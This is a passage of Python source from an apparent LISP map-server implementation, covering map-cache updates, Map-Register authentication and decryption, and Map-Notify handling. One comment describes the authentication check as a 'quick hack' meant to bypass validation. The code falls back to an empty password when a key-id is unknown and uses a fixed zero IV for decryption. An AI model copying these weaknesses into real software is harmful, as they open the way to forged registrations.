lprint("Pruning {} no-address RLOC-records for map-cache".format( \
count))
rloc_set = new_set
#endif
#
# If this is an RLOC-probe reply and the RLOCs are registered with
# merge semantics, this Map-Reply may not include the other RLOCs.
# In this case, do not wipe out the other RLOCs. Get them from the
# existing entry.
#
if (map_reply.rloc_probe and mc != None): rloc_set = mc.rloc_set
#
# If we are overwriting the rloc-set cached in the map-cache entry,
# then remove the old rloc pointers from the RLOC-probe list.
#
rloc_set_change = new_mc
if (mc and rloc_set != mc.rloc_set):
mc.delete_rlocs_from_rloc_probe_list()
rloc_set_change = True
#endif
#
# Add to map-cache. If this is a replace, save uptime.
#
uptime = mc.uptime if (mc) else None
if (mc == None):
mc = lisp_mapping(eid_record.eid, eid_record.group, rloc_set)
mc.mapping_source = source
mc.map_cache_ttl = eid_record.store_ttl()
mc.action = eid_record.action
mc.add_cache(rloc_set_change)
#endif
add_or_replace = "Add"
if (uptime):
mc.uptime = uptime
mc.refresh_time = lisp_get_timestamp()
add_or_replace = "Replace"
#endif
lprint("{} {} map-cache with {} RLOCs".format(add_or_replace,
green(mc.print_eid_tuple(), False), len(rloc_set)))
#
# If there were any changes to the RLOC-set or the keys for any
# existing RLOC in the RLOC-set, tell the external data-plane.
#
if (lisp_ipc_dp_socket and rloc_key_change != None):
lisp_write_ipc_keys(rloc_key_change)
#endif
#
# Send RLOC-probe to highest priority RLOCs if this is a new map-cache
# entry. But if any of the RLOCs were used before in other map-cache
# entries, no need to send RLOC-probes.
#
if (new_mc):
probe = bold("RLOC-probe", False)
for rloc in mc.best_rloc_set:
addr_str = red(rloc.rloc.print_address_no_iid(), False)
lprint("Trigger {} to {}".format(probe, addr_str))
lisp_send_map_request(lisp_sockets, 0, mc.eid, mc.group, rloc)
#endfor
#endif
#endfor
return
#enddef
#
# lisp_compute_auth
#
# Create HMAC hash from packet contents store in lisp_map_register() and
# encode in packet buffer.
#
def lisp_compute_auth(packet, map_register, password):
if (map_register.alg_id == LISP_NONE_ALG_ID): return(packet)
packet = map_register.zero_auth(packet)
hashval = lisp_hash_me(packet, map_register.alg_id, password, False)
#
# Store packed hash value in lisp_map_register().
#
map_register.auth_data = hashval
packet = map_register.encode_auth(packet)
return(packet)
#enddef
#
# lisp_hash_me
#
# Call HMAC hashing code from multiple places. Returns hash value.
#
def lisp_hash_me(packet, alg_id, password, do_hex):
if (alg_id == LISP_NONE_ALG_ID): return(True)
if (alg_id == LISP_SHA_1_96_ALG_ID):
hashalg = hashlib.sha1
#endif
if (alg_id == LISP_SHA_256_128_ALG_ID):
hashalg = hashlib.sha256
#endif
if (do_hex):
hashval = hmac.new(password, packet, hashalg).hexdigest()
else:
hashval = hmac.new(password, packet, hashalg).digest()
#endif
return(hashval)
#enddef
#
# lisp_verify_auth
#
# Compute sha1 or sha2 hash over Map-Register packet and compare with one
# transmitted in packet that is stored in class lisp_map_register.
#
def lisp_verify_auth(packet, alg_id, auth_data, password):
if (alg_id == LISP_NONE_ALG_ID): return(True)
hashval = lisp_hash_me(packet, alg_id, password, True)
matched = (hashval == auth_data)
#
# Print differences if hashes if they do not match.
#
if (matched == False):
lprint("Hashed value: {} does not match packet value: {}".format( \
hashval, auth_data))
#endif
return(matched)
#enddef
#
# lisp_retransmit_map_notify
#
# Retransmit the already build Map-Notify message.
#
def lisp_retransmit_map_notify(map_notify):
dest = map_notify.etr
port = map_notify.etr_port
#
# Did we reach the max number of retries? We are giving up since no
# Map-Notify-Acks have been received.
#
if (map_notify.retry_count == LISP_MAX_MAP_NOTIFY_RETRIES):
lprint("Map-Notify with nonce 0x{} retry limit reached for ETR {}". \
format(map_notify.nonce_key, red(dest.print_address(), False)))
key = map_notify.nonce_key
if (lisp_map_notify_queue.has_key(key)):
map_notify.retransmit_timer.cancel()
lprint("Dequeue Map-Notify from retransmit queue, key is: {}". \
format(key))
try:
lisp_map_notify_queue.pop(key)
except:
lprint("Key not found in Map-Notify queue")
#endtry
#endif
return
#endif
lisp_sockets = map_notify.lisp_sockets
map_notify.retry_count += 1
lprint("Retransmit {} with nonce 0x{} to xTR {}, retry {}".format( \
bold("Map-Notify", False), map_notify.nonce_key,
red(dest.print_address(), False), map_notify.retry_count))
lisp_send_map_notify(lisp_sockets, map_notify.packet, dest, port)
if (map_notify.site): map_notify.site.map_notifies_sent += 1
#
# Restart retransmit timer.
#
map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
lisp_retransmit_map_notify, [map_notify])
map_notify.retransmit_timer.start()
return
#enddef
#
# lisp_send_merged_map_notify
#
# Send Map-Notify with a merged RLOC-set to each ETR in the RLOC-set.
#
def lisp_send_merged_map_notify(lisp_sockets, parent, map_register,
eid_record):
#
# Build EID-record once.
#
eid_record.rloc_count = len(parent.registered_rlocs)
packet_record = eid_record.encode()
eid_record.print_record("Merged Map-Notify ", False)
#
# Buld RLOC-records for merged RLOC-set.
#
for xtr in parent.registered_rlocs:
rloc_record = lisp_rloc_record()
rloc_record.store_rloc_entry(xtr)
packet_record += rloc_record.encode()
rloc_record.print_record(" ")
del(rloc_record)
#endfor
#
# Build Map-Notify for each xTR that needs to receive the Map-Notify.
#
for xtr in parent.registered_rlocs:
dest = xtr.rloc
map_notify = lisp_map_notify(lisp_sockets)
map_notify.record_count = 1
key_id = map_register.key_id
map_notify.key_id = key_id
map_notify.alg_id = map_register.alg_id
map_notify.auth_len = map_register.auth_len
map_notify.nonce = map_register.nonce
map_notify.nonce_key = lisp_hex_string(map_notify.nonce)
map_notify.etr.copy_address(dest)
map_notify.etr_port = map_register.sport
map_notify.site = parent.site
packet = map_notify.encode(packet_record, parent.site.auth_key[key_id])
map_notify.print_notify()
#
# Put Map-Notify state on retransmission queue.
#
key = map_notify.nonce_key
if (lisp_map_notify_queue.has_key(key)):
remove = lisp_map_notify_queue[key]
remove.retransmit_timer.cancel()
del(remove)
#endif
lisp_map_notify_queue[key] = map_notify
#
# Send out.
#
lprint("Send merged Map-Notify to ETR {}".format( \
red(dest.print_address(), False)))
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
parent.site.map_notifies_sent += 1
#
# Set retransmit timer.
#
map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
lisp_retransmit_map_notify, [map_notify])
map_notify.retransmit_timer.start()
#endfor
return
#enddef
#
# lisp_build_map_notify
#
# Setup retransmission queue entry to send the first Map-Notify.
#
def lisp_build_map_notify(lisp_sockets, eid_records, eid_list, record_count,
source, port, nonce, key_id, alg_id, auth_len, site, map_register_ack):
key = lisp_hex_string(nonce) + source.print_address()
#
# If we are already sending Map-Notifies for the 2-tuple, no need to
# queue an entry and send one out. Let the retransmission timer trigger
# the sending.
#
lisp_remove_eid_from_map_notify_queue(eid_list)
if (lisp_map_notify_queue.has_key(key)):
map_notify = lisp_map_notify_queue[key]
s = red(source.print_address_no_iid(), False)
lprint("Map-Notify with nonce 0x{} pending for xTR {}".format( \
lisp_hex_string(map_notify.nonce), s))
return
#endif
map_notify = lisp_map_notify(lisp_sockets)
map_notify.record_count = record_count
key_id = key_id
map_notify.key_id = key_id
map_notify.alg_id = alg_id
map_notify.auth_len = auth_len
map_notify.nonce = nonce
map_notify.nonce_key = lisp_hex_string(nonce)
map_notify.etr.copy_address(source)
map_notify.etr_port = port
map_notify.site = site
map_notify.eid_list = eid_list
#
# Put Map-Notify state on retransmission queue.
#
if (map_register_ack == False):
key = map_notify.nonce_key
lisp_map_notify_queue[key] = map_notify
#endif
if (map_register_ack):
lprint("Send Map-Notify to ack Map-Register")
else:
lprint("Send Map-Notify for RLOC-set change")
#endif
#
# Build packet and copy EID records from Map-Register.
#
packet = map_notify.encode(eid_records, site.auth_key[key_id])
map_notify.print_notify()
if (map_register_ack == False):
eid_record = lisp_eid_record()
eid_record.decode(eid_records)
eid_record.print_record(" ", False)
#endif
#
# Send out.
#
lisp_send_map_notify(lisp_sockets, packet, map_notify.etr, port)
site.map_notifies_sent += 1
if (map_register_ack): return
#
# Set retransmit timer if this is an unsolcited Map-Notify. Otherwise,
# we are acknowledging a Map-Register and the registerer is not going
# to send a Map-Notify-Ack so we shouldn't expect one.
#
map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
lisp_retransmit_map_notify, [map_notify])
map_notify.retransmit_timer.start()
return
#enddef
#
# lisp_send_map_notify_ack
#
# Change Map-Notify message to have a new type (Map-Notify-Ack) and
# reauthenticate message.
#
def lisp_send_map_notify_ack(lisp_sockets, eid_records, map_notify, ms):
map_notify.map_notify_ack = True
#
# Build packet and copy EID records from Map-Register.
#
packet = map_notify.encode(eid_records, ms.password)
map_notify.print_notify()
#
# Send the Map-Notify-Ack.
#
dest = ms.map_server
lprint("Send Map-Notify-Ack to {}".format(
red(dest.print_address(), False)))
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
return
#enddef
#
# lisp_send_multicast_map_notify
#
# Send a Map-Notify message to an xTR for the supplied (S,G) passed into this
# function.
#
def lisp_send_multicast_map_notify(lisp_sockets, site_eid, eid_list, xtr):
map_notify = lisp_map_notify(lisp_sockets)
map_notify.record_count = 1
map_notify.nonce = lisp_get_control_nonce()
map_notify.nonce_key = lisp_hex_string(map_notify.nonce)
map_notify.etr.copy_address(xtr)
map_notify.etr_port = LISP_CTRL_PORT
map_notify.eid_list = eid_list
key = map_notify.nonce_key
#
# If we are already sending Map-Notifies for the 2-tuple, no need to
# queue an entry and send one out. Let the retransmission timer trigger
# the sending.
#
lisp_remove_eid_from_map_notify_queue(map_notify.eid_list)
if (lisp_map_notify_queue.has_key(key)):
map_notify = lisp_map_notify_queue[key]
lprint("Map-Notify with nonce 0x{} pending for ITR {}".format( \
map_notify.nonce, red(xtr.print_address_no_iid(), False)))
return
#endif
#
# Put Map-Notify state on retransmission queue.
#
lisp_map_notify_queue[key] = map_notify
#
# Determine if there are any RTRs in the RLOC-set for this (S,G).
#
rtrs_exist = site_eid.rtrs_in_rloc_set()
if (rtrs_exist):
if (site_eid.is_rtr_in_rloc_set(xtr)): rtrs_exist = False
#endif
#
# Build EID-record.
#
eid_record = lisp_eid_record()
eid_record.record_ttl = 1440
eid_record.eid.copy_address(site_eid.eid)
eid_record.group.copy_address(site_eid.group)
eid_record.rloc_count = 0
for rloc_entry in site_eid.registered_rlocs:
if (rtrs_exist ^ rloc_entry.is_rtr()): continue
eid_record.rloc_count += 1
#endfor
packet = eid_record.encode()
#
# Print contents of Map-Notify.
#
map_notify.print_notify()
eid_record.print_record(" ", False)
#
# Build locator-set with only RTR RLOCs if they exist.
#
for rloc_entry in site_eid.registered_rlocs:
if (rtrs_exist ^ rloc_entry.is_rtr()): continue
rloc_record = lisp_rloc_record()
rloc_record.store_rloc_entry(rloc_entry)
packet += rloc_record.encode()
rloc_record.print_record(" ")
#endfor
#
# Encode it.
#
packet = map_notify.encode(packet, "")
if (packet == None): return
#
# Send Map-Notify to xtR.
#
lisp_send_map_notify(lisp_sockets, packet, xtr, LISP_CTRL_PORT)
#
# Set retransmit timer.
#
map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
lisp_retransmit_map_notify, [map_notify])
map_notify.retransmit_timer.start()
return
#enddef
#
# lisp_queue_multicast_map_notify
#
# This funciton will look for the ITRs in the local site cache.
#
def lisp_queue_multicast_map_notify(lisp_sockets, rle_list):
null_group = lisp_address(LISP_AFI_NONE, "", 0, 0)
for sg in rle_list:
sg_site_eid = lisp_site_eid_lookup(sg[0], sg[1], True)
if (sg_site_eid == None): continue
#
# (S,G) RLOC-set could be empty when last RLE goes away. We will have
# to search all individual registrations searching for RTRs.
#
# We store in a dictonary array so we can remove duplicates.
#
sg_rloc_set = sg_site_eid.registered_rlocs
if (len(sg_rloc_set) == 0):
temp_set = {}
for se in sg_site_eid.individual_registrations.values():
for rloc_entry in se.registered_rlocs:
if (rloc_entry.is_rtr() == False): continue
temp_set[rloc_entry.rloc.print_address()] = rloc_entry
#endfor
#endfor
sg_rloc_set = temp_set.values()
#endif
#
# If this is a (0.0.0.0/0, G) or a (0::/0, G), we send a Map-Notify
# to all members (all RLOCs in the sg_rloc_set.
#
notify = []
found_rtrs = False
if (sg_site_eid.eid.address == 0 and sg_site_eid.eid.mask_len == 0):
notify_str = []
rle_nodes = []
if (len(sg_rloc_set) != 0 and sg_rloc_set[0].rle != None):
rle_nodes = sg_rloc_set[0].rle.rle_nodes
#endif
for rle_node in rle_nodes:
notify.append(rle_node.address)
notify_str.append(rle_node.address.print_address_no_iid())
#endfor
lprint("Notify existing RLE-nodes {}".format(notify_str))
else:
#
# If the (S,G) has an RTR registered, then we will send a
# Map-Notify to the RTR instead the ITRs of the source-site.
#
for rloc_entry in sg_rloc_set:
if (rloc_entry.is_rtr()): notify.append(rloc_entry.rloc)
#endfor
#
# If no RTRs were found, get ITRs from source-site.
#
found_rtrs = (len(notify) != 0)
if (found_rtrs == False):
site_eid = lisp_site_eid_lookup(sg[0], null_group, False)
if (site_eid == None): continue
for rloc_entry in site_eid.registered_rlocs:
if (rloc_entry.rloc.is_null()): continue
notify.append(rloc_entry.rloc)
#endfor
#endif
#
# No ITRs or RTRs fond.
#
if (len(notify) == 0):
lprint("No ITRs or RTRs found for {}, Map-Notify suppressed". \
format(green(sg_site_eid.print_eid_tuple(), False)))
continue
#endif
#endif
#
# Send multicast Map-Notify to either ITR-list or RTR-list.
#
for xtr in notify:
lprint("Build Map-Notify to {}TR {} for {}".format("R" if \
found_rtrs else "x", red(xtr.print_address_no_iid(), False),
green(sg_site_eid.print_eid_tuple(), False)))
el = [sg_site_eid.print_eid_tuple()]
lisp_send_multicast_map_notify(lisp_sockets, sg_site_eid, el, xtr)
time.sleep(.001)
#endfor
#endfor
return
#enddef
#
# lisp_find_sig_in_rloc_set
#
# Look for a "signature" key in a JSON RLOC-record. Return None, if not found.
# Return RLOC record if found.
#
def lisp_find_sig_in_rloc_set(packet, rloc_count):
for i in range(rloc_count):
rloc_record = lisp_rloc_record()
packet = rloc_record.decode(packet, None)
json_sig = rloc_record.json
if (json_sig == None): continue
try:
json_sig = json.loads(json_sig.json_string)
except:
lprint("Found corrupted JSON signature")
continue
#endtry
if (json_sig.has_key("signature") == False): continue
return(rloc_record)
#endfor
return(None)
#enddef
#
# lisp_get_eid_hash
#
# From an EID, return EID hash value. Here is an example where all but the
# high-order byte is the EID hash for each hash-length:
#
# EID: fd4f:5b9f:f67c:6dbd:3799:48e1:c6a2:9430
# EID-hash: 4f:5b9f:f67c:6dbd:3799:48e1:c6a2:9430 eid_hash_len = 120
# EID-hash: 6dbd:3799:48e1:c6a2:9430 eid_hash_len = 80
#
# Note when an eid-prefix in lisp_eid_hashes[] has an instance-id of -1, it
# means the eid-prefix is used for all EIDs from any instance-id.
#
# Returns a string with hex digits between colons and the hash length in bits.
# Returns None if the IPv6 EID is not a crypto-hash address. These addresses
# are not authenticated.
#
def lisp_get_eid_hash(eid):
hash_mask_len = None
for eid_prefix in lisp_eid_hashes:
#
# For wildcarding the instance-ID.
#
iid = eid_prefix.instance_id
if (iid == -1): eid_prefix.instance_id = eid.instance_id
ms = eid.is_more_specific(eid_prefix)
eid_prefix.instance_id = iid
if (ms):
hash_mask_len = 128 - eid_prefix.mask_len
break
#endif
#endfor
if (hash_mask_len == None): return(None)
address = eid.address
eid_hash = ""
for i in range(0, hash_mask_len / 16):
addr = address & 0xffff
addr = hex(addr)[2:-1]
eid_hash = addr.zfill(4) + ":" + eid_hash
address >>= 16
#endfor
if (hash_mask_len % 16 != 0):
addr = address & 0xff
addr = hex(addr)[2:-1]
eid_hash = addr.zfill(2) + ":" + eid_hash
#endif
return(eid_hash[0:-1])
#enddef
#
# lisp_lookup_public_key
#
# Given an EID, do a mapping system lookup for a distinguished-name EID
# 'hash-<cga-hash>' to obtain the public-key from an RLOC-record.
#
# Return [hash_id, pubkey, True/False]. Values can be of value None but last
# boolean argument is if the hash lookup was found.
#
def lisp_lookup_public_key(eid):
iid = eid.instance_id
#
# Parse out CGA hash to do public-key lookup with instance-ID and hash
# as a distinguished-name EID.
#
pubkey_hash = lisp_get_eid_hash(eid)
if (pubkey_hash == None): return([None, None, False])
pubkey_hash = "hash-" + pubkey_hash
hash_eid = lisp_address(LISP_AFI_NAME, pubkey_hash, len(pubkey_hash), iid)
group = lisp_address(LISP_AFI_NONE, "", 0, iid)
#
# Do lookup in local instance-ID.
#
site_eid = lisp_site_eid_lookup(hash_eid, group, True)
if (site_eid == None): return([hash_eid, None, False])
#
# Look for JSON RLOC with key "public-key".
#
pubkey = None
for rloc in site_eid.registered_rlocs:
json_pubkey = rloc.json
if (json_pubkey == None): continue
try:
json_pubkey = json.loads(json_pubkey.json_string)
except:
lprint("Registered RLOC JSON format is invalid for {}".format( \
pubkey_hash))
return([hash_eid, None, False])
#endtry
if (json_pubkey.has_key("public-key") == False): continue
pubkey = json_pubkey["public-key"]
break
#endfor
return([hash_eid, pubkey, True])
#enddef
#
# lisp_verify_cga_sig
#
# Verify signature of an IPv6 CGA-based EID if the public-key hash exists
# in the local mapping database (with same instance-ID).
#
def lisp_verify_cga_sig(eid, rloc_record):
#
# Use signature-eid if in JSON string. Otherwise, Crypto-EID is signature-
# EID.
#
sig = json.loads(rloc_record.json.json_string)
if (lisp_get_eid_hash(eid)):
sig_eid = eid
elif (sig.has_key("signature-eid")):
sig_eid_str = sig["signature-eid"]
sig_eid = lisp_address(LISP_AFI_IPV6, sig_eid_str, 0, 0)
else:
lprint(" No signature-eid found in RLOC-record")
return(False)
#endif
#
# Lookup CGA hash in mapping datbase to get public-key.
#
hash_eid, pubkey, lookup_good = lisp_lookup_public_key(sig_eid)
if (hash_eid == None):
eid_str = green(sig_eid.print_address(), False)
lprint(" Could not parse hash in EID {}".format(eid_str))
return(False)
#endif
found = "found" if lookup_good else bold("not found", False)
eid_str = green(hash_eid.print_address(), False)
lprint(" Lookup for crypto-hashed EID {} {}".format(eid_str, found))
if (lookup_good == False): return(False)
if (pubkey == None):
lprint(" RLOC-record with public-key not found")
return(False)
#endif
pubkey_str = pubkey[0:8] + "..." + pubkey[-8::]
lprint(" RLOC-record with public-key '{}' found".format(pubkey_str))
#
# Get signature from RLOC-record in a form to let key.verify() do its
# thing.
#
sig_str = sig["signature"]
try:
sig = binascii.a2b_base64(sig_str)
except:
lprint(" Incorrect padding in signature string")
return(False)
#endtry
sig_len = len(sig)
if (sig_len & 1):
lprint(" Signature length is odd, length {}".format(sig_len))
return(False)
#endif
#
# The signature is over the following string: "[<iid>]<eid>".
#
sig_data = sig_eid.print_address()
#
# Verify signature of CGA and public-key.
#
pubkey = binascii.a2b_base64(pubkey)
try:
key = ecdsa.VerifyingKey.from_pem(pubkey)
except:
bad = bold("Bad public-key", False)
lprint(" {}, not in PEM format".format(bad))
return(False)
#endtry
#
# The hashfunc must be supplied to get signature interoperability between
# a Go signer an a Python verifier. The signature data must go through
# a sha256 hash first. Python signer must use:
#
# ecdsa.SigningKey.sign(sig_data, hashfunc=hashlib.sha256)
#
# Note to use sha256 you need a curve of NIST256p.
#
try:
good = key.verify(sig, sig_data, hashfunc=hashlib.sha256)
except:
lprint(" Signature library failed for signature data '{}'".format( \
sig_data))
lprint(" Signature used '{}'".format(sig_str))
return(False)
#endtry
return(good)
#enddef
#
# lisp_remove_eid_from_map_notify_queue
#
# Check to see if any EIDs from the input list are in the Map-Notify
# retransmission queue. If so, remove them. That is, pop the key from the
# dictionary array. The key is the catentation of the xTR address and
# map-notify nonce.
#
def lisp_remove_eid_from_map_notify_queue(eid_list):
#
# Determine from the supplied EID-list, if any EID is in any EID-list of
# a queued Map-Notify.
#
keys_to_remove = []
for eid_tuple in eid_list:
for mn_key in lisp_map_notify_queue:
map_notify = lisp_map_notify_queue[mn_key]
if (eid_tuple not in map_notify.eid_list): continue
keys_to_remove.append(mn_key)
timer = map_notify.retransmit_timer
if (timer): timer.cancel()
lprint("Remove from Map-Notify queue nonce 0x{} for EID {}".\
format(map_notify.nonce_key, green(eid_tuple, False)))
#endfor
#endfor
#
# Now remove keys that were determined to be removed.
#
for mn_key in keys_to_remove: lisp_map_notify_queue.pop(mn_key)
return
#enddef
#
# lisp_decrypt_map_register
#
# Check if we should just return a non encrypted packet, or decrypt and return
# a plaintext Map-Register message.
#
def lisp_decrypt_map_register(packet):
#
# Parse first 4 bytes which is not encrypted. If packet is not encrypted,
# return to caller. If it is encrypted, get 3-bit key-id next to e-bit.
#
header = socket.ntohl(struct.unpack("I", packet[0:4])[0])
e_bit = (header >> 13) & 0x1
if (e_bit == 0): return(packet)
ekey_id = (header >> 14) & 0x7
#
# Use 16-byte key which is 32 string characters.
#
try:
ekey = lisp_ms_encryption_keys[ekey_id]
ekey = ekey.zfill(32)
iv = "0" * 8
except:
lprint("Cannot decrypt Map-Register with key-id {}".format(ekey_id))
return(None)
#endtry
d = bold("Decrypt", False)
lprint("{} Map-Register with key-id {}".format(d, ekey_id))
plaintext = chacha.ChaCha(ekey, iv).decrypt(packet[4::])
return(packet[0:4] + plaintext)
#enddef
#
# lisp_process_map_register
#
# Process received Map-Register message.
#
def lisp_process_map_register(lisp_sockets, packet, source, sport):
global lisp_registered_count
#
# First check if we are expecting an encrypted Map-Register. This call
# will either return a unencrypted packet, a decrypted packet, or None
# if the key-id from the Map-Register is not registered.
#
packet = lisp_decrypt_map_register(packet)
if (packet == None): return
map_register = lisp_map_register()
orig_packet, packet = map_register.decode(packet)
if (packet == None):
lprint("Could not decode Map-Register packet")
return
#endif
map_register.sport = sport
map_register.print_map_register()
#
# Verify that authentication parameters are consistent.
#
sha1_or_sha2 = True
if (map_register.auth_len == LISP_SHA1_160_AUTH_DATA_LEN):
sha1_or_sha2 = True
#endif
if (map_register.alg_id == LISP_SHA_256_128_ALG_ID):
sha1_or_sha2 = False
#endif
#
# For tracking which (S,G) RLEs have changed.
#
rle_list = []
#
# Process each EID record in Map-Register message.
#
site = None
start_eid_records = packet
eid_list = []
record_count = map_register.record_count
for i in range(record_count):
eid_record = lisp_eid_record()
rloc_record = lisp_rloc_record()
packet = eid_record.decode(packet)
if (packet == None):
lprint("Could not decode EID-record in Map-Register packet")
return
#endif
eid_record.print_record(" ", False)
#
# Lookup lisp_site entry.
#
site_eid = lisp_site_eid_lookup(eid_record.eid, eid_record.group,
False)
match_str = site_eid.print_eid_tuple() if site_eid else None
#
# Allowing overlapping ams registered prefixes. Make sure we get the
# configured parent entry and not the registered more-specific. This
# registration could be a more-specific of the registered more-specific
# entry.
#
if (site_eid and site_eid.accept_more_specifics == False):
if (site_eid.eid_record_matches(eid_record) == False):
parent = site_eid.parent_for_more_specifics
if (parent): site_eid = parent
#endif
#endif
#
# Check if this is a new more-specific EID-prefix registration that
# will match a static configured site-eid with "accept-more-specifics"
# configured.
#
ams = (site_eid and site_eid.accept_more_specifics)
if (ams):
ms_site_eid = lisp_site_eid(site_eid.site)
ms_site_eid.dynamic = True
ms_site_eid.eid.copy_address(eid_record.eid)
ms_site_eid.group.copy_address(eid_record.group)
ms_site_eid.parent_for_more_specifics = site_eid
ms_site_eid.add_cache()
ms_site_eid.inherit_from_ams_parent()
site_eid.more_specific_registrations.append(ms_site_eid)
site_eid = ms_site_eid
else:
site_eid = lisp_site_eid_lookup(eid_record.eid, eid_record.group,
True)
#endif
eid_str = eid_record.print_eid_tuple()
if (site_eid == None):
notfound = bold("Site not found", False)
lprint(" {} for EID {}{}".format(notfound, green(eid_str, False),
", matched non-ams {}".format(green(match_str, False) if \
match_str else "")))
#
# Need to hop over RLOC-set so we can get to the next EID-record.
#
packet = rloc_record.end_of_rlocs(packet, eid_record.rloc_count)
if (packet == None):
lprint(" Could not decode RLOC-record in Map-Register packet")
return
#endif
continue
#endif
site = site_eid.site
if (ams):
e = site_eid.parent_for_more_specifics.print_eid_tuple()
lprint(" Found ams {} for site '{}' for registering prefix {}". \
format(green(e, False), site.site_name, green(eid_str, False)))
else:
e = green(site_eid.print_eid_tuple(), False)
lprint(" Found {} for site '{}' for registering prefix {}". \
format(e, site.site_name, green(eid_str, False)))
#endif
#
# Check if site configured in admin-shutdown mode.
#
if (site.shutdown):
lprint((" Rejecting registration for site '{}', configured in " +
"admin-shutdown state").format(site.site_name))
packet = rloc_record.end_of_rlocs(packet, eid_record.rloc_count)
continue
#endif
#
# Verify authentication before processing locator-set. Quick hack
# while I figure out why sha1 and sha2 authentication is not working
# from cisco. An NX-OS Map-Register will have a 0 nonce. We are going
# to use this to bypass the authentication check.
#
key_id = map_register.key_id
if (site.auth_key.has_key(key_id)):
password = site.auth_key[key_id]
else:
password = ""
#endif
auth_good = lisp_verify_auth(orig_packet, map_register.alg_id,
map_register.auth_data, password)
dynamic = "dynamic " if site_eid.dynamic else ""
passfail = bold("passed" if auth_good else "failed", False)
key_id = "key-id {}".format(key_id) if key_id == map_register.key_id \
else "bad key-id {}".format(map_register.key_id)
lprint(" Authentication {} for {}EID-prefix {}, {}".format( \
passfail, dynamic, green(eid_str, False), key_id))
#
# If the IPv6 EID is a CGA, verify signature if it exists in an
# RLOC-record.
#
cga_good = True
is_crypto_eid = (lisp_get_eid_hash(eid_record.eid) != None)
if (is_crypto_eid or site_eid.require_signature):
required = "Required " if site_eid.require_signature else ""
eid_str = green(eid_str, False)
rloc = lisp_find_sig_in_rloc_set(packet, eid_record.rloc_count)
if (rloc == None):
cga_good = False
lprint((" {}EID-crypto-hash signature verification {} " + \
"for EID-prefix {}, no signature found").format(required,
bold("failed", False), eid_str))
else:
cga_good = lisp_verify_cga_sig(eid_record.eid, rloc)
passfail = bold("passed" if cga_good else "failed", False)
lprint((" {}EID-crypto-hash signature verification {} " + \
"for EID-prefix {}").format(required, passfail, eid_str))
#endif
#endif
if (auth_good == False or cga_good == False):
packet = rloc_record.end_of_rlocs(packet, eid_record.rloc_count)
if (packet == None):
lprint(" Could not decode RLOC-record in Map-Register packet")
return
#endif
continue
#endif
#
# If merge being requested get individual site-eid. If not, and what
# was cached had merge bit set, set flag to issue error.
#
if (map_register.merge_register_requested):
parent = site_eid
parent.inconsistent_registration = False
#
# Clear out all registrations, there is a new site-id registering.
# Or there can be multiple sites registering for a multicast (S,G).
#
if (site_eid.group.is_null()):
if (parent.site_id != map_register.site_id):
parent.site_id = map_register.site_id
parent.registered = False
parent.individual_registrations = {}
parent.registered_rlocs = []
lisp_registered_count -= 1
#endif
#endif
key = source.address + map_register.xtr_id
if (site_eid.individual_registrations.has_key(key)):
site_eid = site_eid.individual_registrations[key]
else:
site_eid = lisp_site_eid(site)
site_eid.eid.copy_address(parent.eid)
site_eid.group.copy_address(parent.group)
parent.individual_registrations[key] = site_eid
#endif
else:
site_eid.inconsistent_registration = \
site_eid.merge_register_requested
#endif
site_eid.map_registers_received += 1
#
# If TTL is 0, unregister entry if source of Map-Reqister is in the
# list of currently registered RLOCs.
#
bad = (site_eid.is_rloc_in_rloc_set(source) == False)
if (eid_record.record_ttl == 0 and bad):
lprint(" Ignore deregistration request from {}".format( \
red(source.print_address_no_iid(), False)))
continue
#endif
#
# Clear out previously stored RLOCs. Put new ones in if validated
# against configured ones.
#
previous_rlocs = site_eid.registered_rlocs
site_eid.registered_rlocs = []
#
# Process each RLOC record in EID record.
#
start_rloc_records = packet
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
packet = rloc_record.decode(packet, None)
if (packet == None):
lprint(" Could not decode RLOC-record in Map-Register packet")
return
#endif
rloc_record.print_record(" ")
#
# Run RLOC in Map-Register against configured RLOC policies.
#
if (len(site.allowed_rlocs) > 0):
addr_str = rloc_record.rloc.print_address()
if (site.allowed_rlocs.has_key(addr_str) == False):
lprint((" Reject registration, RLOC {} not " + \
"configured in allowed RLOC-set").format( \
red(addr_str, False)))
site_eid.registered = False
packet = rloc_record.end_of_rlocs(packet,
eid_record.rloc_count - j - 1)
break
#endif
#endif
#
# RLOC validated good. Otherwise, go to next EID record
#
rloc = lisp_rloc()
rloc.store_rloc_from_record(rloc_record, None, source)
#
# If the source of the Map-Register is in the locator-set, then
# store if it wants Map-Notify messages when a new locator-set
# is registered later.
#
if (source.is_exact_match(rloc.rloc)):
rloc.map_notify_requested = map_register.map_notify_requested
#endif
#
# Add to RLOC set for site-eid.
#
site_eid.registered_rlocs.append(rloc)
#endfor
changed_rloc_set = \
(site_eid.do_rloc_sets_match(previous_rlocs) == False)
#
# Do not replace RLOCs if the Map-Register is a refresh and the
# locator-set is different.
#
if (map_register.map_register_refresh and changed_rloc_set and
site_eid.registered):
lprint(" Reject registration, refreshes cannot change RLOC-set")
site_eid.registered_rlocs = previous_rlocs
continue
#endif
#
# Copy fields from packet into internal data structure. First set
# site EID specific state.
#
if (site_eid.registered == False):
site_eid.first_registered = lisp_get_timestamp()
lisp_registered_count += 1
#endif
site_eid.last_registered = lisp_get_timestamp()
site_eid.registered = (eid_record.record_ttl != 0)
site_eid.last_registerer = source
#
# Now set site specific state.
#
site_eid.auth_sha1_or_sha2 = sha1_or_sha2
site_eid.proxy_reply_requested = map_register.proxy_reply_requested
site_eid.lisp_sec_present = map_register.lisp_sec_present
site_eid.map_notify_requested = map_register.map_notify_requested
site_eid.mobile_node_requested = map_register.mobile_node
site_eid.merge_register_requested = \
map_register.merge_register_requested
site_eid.use_register_ttl_requested = map_register.use_ttl_for_timeout
if (site_eid.use_register_ttl_requested):
site_eid.register_ttl = eid_record.store_ttl()
else:
site_eid.register_ttl = LISP_SITE_TIMEOUT_CHECK_INTERVAL * 3
#endif
site_eid.xtr_id_present = map_register.xtr_id_present
if (site_eid.xtr_id_present):
site_eid.xtr_id = map_register.xtr_id
site_eid.site_id = map_register.site_id
#endif
#
# If merge requested, do it now for this EID-prefix.
#
if (map_register.merge_register_requested):
